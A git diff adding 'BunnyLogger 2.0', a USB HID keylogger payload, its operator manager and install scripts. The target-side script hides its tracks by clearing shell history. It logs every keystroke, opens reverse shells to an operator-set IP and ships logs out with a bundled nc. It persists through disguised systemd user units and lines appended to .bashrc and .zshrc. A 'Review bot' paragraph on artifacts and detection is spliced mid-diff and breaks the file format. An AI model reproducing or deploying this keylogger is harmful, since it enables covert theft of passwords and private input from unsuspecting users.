diff --git a/payloads/library/credentials/BunnyLogger2.0/README.md b/payloads/library/credentials/BunnyLogger2.0/README.md
new file mode 100644
index 000000000..1bb556ca5
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger2.0/README.md
@@ -0,0 +1,39 @@
+## About:
+* Title: BunnyLogger 2.0
+* Description: Key logger which sends each and every key stroke of target remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Credentials
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker.
+
+### Features:
+* Live keystroke capturing.
+* Stored Keystroke capturing.
+* Bunny Logger Manager: Interactive TUI Dashboard.
+* Detailed key logs.
+* Persistent.
+* Autostart payload on boot.
+
+### Directory Structure of payload components:
+
+| FileName | Directory |
+| -------------- | ------------------------------ |
+| payload.txt | /payload/switch1/ |
+| payload.sh | /payload/ |
+| requirements/* | /payloads/library/bunnyLogger2 |
+
+### LED Status:
+
+* `LED SETUP` : MAGENTA
+* `LED ATTACK` : YELLOW
+* `LED FINISH` : GREEN
+
+### Usage:
+* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh`
+* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/credentials/BunnyLogger2.0/bunnyLoggerMgr b/payloads/library/credentials/BunnyLogger2.0/bunnyLoggerMgr
new file mode 100644
index 000000000..3a88d66e3
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger2.0/bunnyLoggerMgr
@@ -0,0 +1,191 @@
+#!/bin/bash
+allowAbort=true;
+myInterruptHandler()
+{
+ if $allowAbort; then
+ echo
+ echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1;
+ fi;
+}
+trap myInterruptHandler SIGINT
+echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m"
+echo
+echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs."
+echo
+read -p "Enter your choice: " ch
+create(){
+ read -p "Enter Target's name(without whitespaces): " name
+ if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists."
+ exit 1
+ fi
+ read -p "Enter Servers IP: " ip
+ read -p "Enter Unique Port Number(1500-65535): " port
+ read -p "Enter another Unique Port Number(1500-65535): " secPort
+ if [ "$port" == "$secPort" ]; then
+ echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar."
+ exit 1
+ fi
+ if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"."
+ exit 1
+ fi
+ max=65535
+ min=1500
+ if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then
+ read -p "Specify directory for output: " dir
+ if [ ! -d "$dir" ]; then
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
+ exit 1
+ else
+ cp -r ~/.config/bunnyLogger/payload.sh $dir
+ fi
+ sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh
+ sed -i -e "s/4444/$port/g" $dir/payload.sh
+ sed -i -e "s/5555/$secPort/g" $dir/payload.sh
+ echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db
+ else
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"."
+ exit 1
+ fi
+
+}
+list(){
+
+ column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}'
+}
+remove(){
+ echo
+ list
+ echo
+ read -p "Enter name of target to remove: " rmv
+ if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then
+ sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db
+ echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"."
+ else
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found."
+ fi
+}
+update(){
+ echo
+ list
+ echo
+ read -p "Choose target number: " cho
+ read -p "You want to update (ip|portOne|portTwo): " ent
+ if [ "$ent" = ip ]
+ then
+ one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
+ read -p "Enter new ip: " use
+ if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
+ sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db
+ echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP."
+ else
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"."
+ exit
+ fi
+ elif [ "$ent" = portOne ]
+ then
+ two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
+ read -p "Enter new Port number: " useP
+ max=65535
+ min=1500
+ if (( $useP <= $max )) && (( $useP >= $min )); then
+ sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
+ echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
+ else
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
+ fi
+ elif [ "$ent" = portTwo ]
+ then
+ two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
+ read -p "Enter new Port number: " useP
+ max=65535
+ min=1500
+ if (( $useP <= $max )) && (( $useP >= $min )); then
+ sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
+ echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
+ else
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
+ fi
+ else
+ echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"."
+ fi
+}
+fetch(){
+ echo
+ list
+ echo
+ read -p "Enter Target number to connect: " cho
+ one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
+ two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
+ three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
+ echo -en "1] Live Capture \t2]Fetch Stored Logs: "
+ read typ
+ case $typ in
+ 1)
+ read -p "Specify directory for output: " dir
+ read -p "Enter filename to store logs: " filename
+ if [ ! -d "$dir" ]; then
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
+ exit 1
+ else
+ echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."
+ nc -lvp $two > $dir/$filename.log
+ fi
+ ;;
+ 2)
+ read -p "Specify directory for output: " dir
+ read -p "Enter filename to store logs: " filename
+ if [ ! -d "$dir" ]; then
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
+ exit 1
+ else
+ nc -lvp 1444 > $dir/$filename.log &
+ nc -lvp $three
+ fi
+ ;;
+ *)
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.."
+ ;;
+ esac
+}
+decode(){
+ echo -e "1] Normal Decode \t2] Informative Decode"
+ read -p "Enter your choice: " cho
+ read -p "Enter path of file to decode: " path
+ read -p "Enter path for decoded log: " out
+ case $cho in
+ 1)
+ awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out
+ ;;
+ 2)
+ awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out
+ ;;
+ *)
+ echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"."
+ ;;
+ esac
+}
+case $ch in
+ 1)
+ fetch
+ ;;
+ 2)
+ create
+ ;;
+ 3)
+ list
+ ;;
+ 4)
+ update
+ ;;
+ 5)
+ remove
+ ;;
+ 6)
+ decode
+ ;;
+ *)
+ echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"."
+ ;;
+esac
diff --git a/payloads/library/credentials/BunnyLogger2.0/install.sh b/payloads/library/credentials/BunnyLogger2.0/install.sh
new file mode 100644
index 000000000..fba06e5da
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger2.0/install.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+path=~/.config/bunnyLogger
+mkdir $path
+cp payload.sh $path
+touch $path/bunnyLogger.db
+chmod +x bunnyLoggerMgr
+sudo cp bunnyLoggerMgr /usr/local/bin/
diff --git a/payloads/library/credentials/BunnyLogger2.0/payload.sh b/payloads/library/credentials/BunnyLogger2.0/payload.sh
new file mode 100644
index 000000000..16ae54df6
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger2.0/payload.sh
@@ -0,0 +1,28 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir -p /var/tmp/.system/logs
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/tools/xinput /var/tmp/.system/
+cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/
+cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/
+chmod +x /var/tmp/.system/nc
+echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
+chmod +x /var/tmp/.system/sys
+chmod +x /var/tmp/.system/clctrl
+chmod +x /var/tmp/.system/xinput
+echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
+echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
+chmod +x /var/tmp/.system/reboot
+echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+systemctl --user enable --now reboot.service
+systemctl --user start --now reboot.service
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
+chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
diff --git a/payloads/library/credentials/BunnyLogger2.0/payload.txt b/payloads/library/credentials/BunnyLogger2.0/payload.txt
new file mode 100644
index 000000000..f9c679692
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger2.0/payload.txt
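Review bot: The target-side artifacts this script creates are documented nowhere in the commit and are not covered by uninstall.sh, which only cleans the operator's own machine. On the host it leaves a staging directory `/var/tmp/.system/` holding copied `xinput`, `nc` and `clctrl` binaries plus the generated `sys`, `systemBus` and `reboot` scripts and a `logs/` directory; two user-level units, `~/.config/systemd/user/systemBUS.service` and `reboot.service`, enabled with `systemctl --user enable --now`; and lines appended to `~/.bashrc` and `~/.zshrc` that re-enable those units on every shell start. For an authorized engagement a removal procedure for each of these belongs in the README next to the install instructions, so the tester can restore the host. For defenders these same items are the detection surface: new unit files under a user's `~/.config/systemd/user`, executables written under `/var/tmp`, shell rc modification, and a bundled `nc` binary are all observable by file-integrity monitoring and EDR, and the automount-based staging in payload.txt is blocked by restricting unprivileged udisks mounts or USB HID enumeration (e.g. USBGuard).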
@@ -0,0 +1,56 @@
+# Title: BunnyLogger
+# Description: Key logger which sends each and every key stroke of target remotely/locally.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Credentials
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 2000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/credentials/BunnyLogger2.0/requirements/clctrl b/payloads/library/credentials/BunnyLogger2.0/requirements/clctrl
new file mode 100644
index 000000000..241ac449c
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger2.0/requirements/clctrl
@@ -0,0 +1,41 @@
+#!/bin/bash
+transfer(){
+ echo -e "\033[1;34m[INFO]: Target Logs:\033[0m"
+ cd /var/tmp/.system/logs/
+ ls /var/tmp/.system/logs/ | sort
+ echo
+ echo -n "Enter filename to transfer: "
+ read ch
+ if [ -f $ch ];
+ then
+ echo -e "\033[1;34m[INFO]: Transferring file...\033[0m"
+ /var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1
+ if [ $? -eq 0 ]; then
+ echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m"
+ else
+ echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m"
+ fi
+ else
+ echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m"
+ fi
+}
+conti(){
+ while :
+ do
+ echo
+ echo -n "Would you like to transfer more files? [Y/N]: "
+ read ch
+ if [ "$ch" = y ] || [ "$ch" = Y ];
+ then
+ transfer
+ elif [ "$ch" = N ] || [ "$ch" = n ];
+ then
+ echo -e "\033[1;34m[INFO]: Terminating...\033[0m"
+ break
+ else
+ echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m"
+ fi
+ done
+}
+transfer
+conti
diff --git a/payloads/library/credentials/BunnyLogger2.0/requirements/nc b/payloads/library/credentials/BunnyLogger2.0/requirements/nc
new file mode 100644
index 000000000..8612bf0cd
Binary files /dev/null and b/payloads/library/credentials/BunnyLogger2.0/requirements/nc differ
diff --git a/payloads/library/credentials/BunnyLogger2.0/requirements/xinput b/payloads/library/credentials/BunnyLogger2.0/requirements/xinput
new file mode 100644
index 000000000..b9a549880
Binary files /dev/null and b/payloads/library/credentials/BunnyLogger2.0/requirements/xinput differ
diff --git a/payloads/library/credentials/BunnyLogger2.0/uninstall.sh b/payloads/library/credentials/BunnyLogger2.0/uninstall.sh
new file mode 100644
index 000000000..e6059c360
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger2.0/uninstall.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+path=~/.config/bunnyLogger
+rm -rf $path
+sudo rm /usr/local/bin/bunnyLoggerMgr